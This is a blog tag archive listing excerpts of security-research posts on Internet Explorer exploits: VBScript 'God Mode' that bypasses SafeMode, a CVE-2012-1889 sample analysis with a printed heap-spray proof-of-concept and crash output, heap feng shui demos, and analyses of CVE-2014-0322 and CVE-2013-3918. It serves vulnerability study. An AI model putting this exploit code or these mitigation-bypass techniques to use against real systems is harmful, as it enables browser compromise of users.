标签归档 » IE

How to use VBScript to turn on the God Mode?

What is the God Mode? This concept is came from yuange, it means if we turn on this God Mode, we can do anything we what. And What the God Mode really is? We know if we want to execute the script code in the browser to create a object like Shell.Application, the script engine will check the SafeMode. if this is set, it will block the code. That is the God Mode. Yuange also call this is DVE(Data Virtual Execution), This is just execute the script, not the binary code. So the ASLR,DEP,EMET,CFI all of the defense technology will be fail. What we are going to do is to clear the SafeMode flag. (Notice: All the following code is …..

CVE-2012-1889 exploit sample analysis

Hi, this is a IE exploit sample. I found this in the vt. https://www.virustotal.com/en/file/1df80150284800e82b1dd64579aae71ebce2f6fd44ea37e4c83af287502452ee/analysis/ But I see the detection radio is so low, 12 / 51. many vendor can’t detect this sample. From the vt tag, it seems CVE-2012-1889, and it really an old vulnerability. We also can find the exploit code here: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb Now Let’s look through this sample The poc code is like following: <script type=”text/javascript”>// <![CDATA[ var obj=document.getElementById('puZz').object; var src=unescape("%"+"u0c08"+"%"+"u0c0c"); while(src.length<0x1002)src+=src; src="\\\\xxx"+src; src=src.substr(0,0x1000-10); var pic=document.createElement("img"); pic.src=src; pic.nameProp; obj['definition'](1000); // ]]></script> Now we load the poc in the IE. It crashed. (90c.76c): Access violation – code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0c0c0c08 ebx=00000000 ecx=5dda5dfc …..

The Art of Leaks: The Return of Heap Feng Shui(demo code)

Thanks ga1ois give us a very excellent lecture about the Art of Leaks in the consecwest. He found this way can read/write any memory of the process. Cool! And I upload the ppt here!The+Art+of+Leaks+-+read+version+-+Yoyo also you can download the ppt from his github. https://github.com/ga1ois/CanSecWest2014/blob/master/The Art of Leaks – read version – Yoyo.pdf Now I write some demo codes here

CVE-2014-0322 0day root cause analysis

Yesterday, fireeye has posted a blog about a new 0day attack. (http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/new-ie-zero-day-found-in-watering-hole-attack-2.html) (http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html). This 0day is affected IE 10, and has been assigned as CVE-2014-0322, and it can be used to ATP attack. We can find the sample here: http://jsunpack.jeek.org/?report=a7d85dd462456a816b1ebc8306550e0c9b61c75e

CVE-2013-3918 exploit analysis

Last month, Fireeye catch a 0day attack which the MS assigned CVE-2013-3918 to. Basically, this 0day may be in the wild more than one year. We can find the sample in here http://jsunpack.jeek.org/?report=0fe86b1a6fc27dbd4134d96e68b9153682cc6831. And Metasploit also release a module which can work on winxp+ie8. Now I will give a deeply analysis for this vulnerability.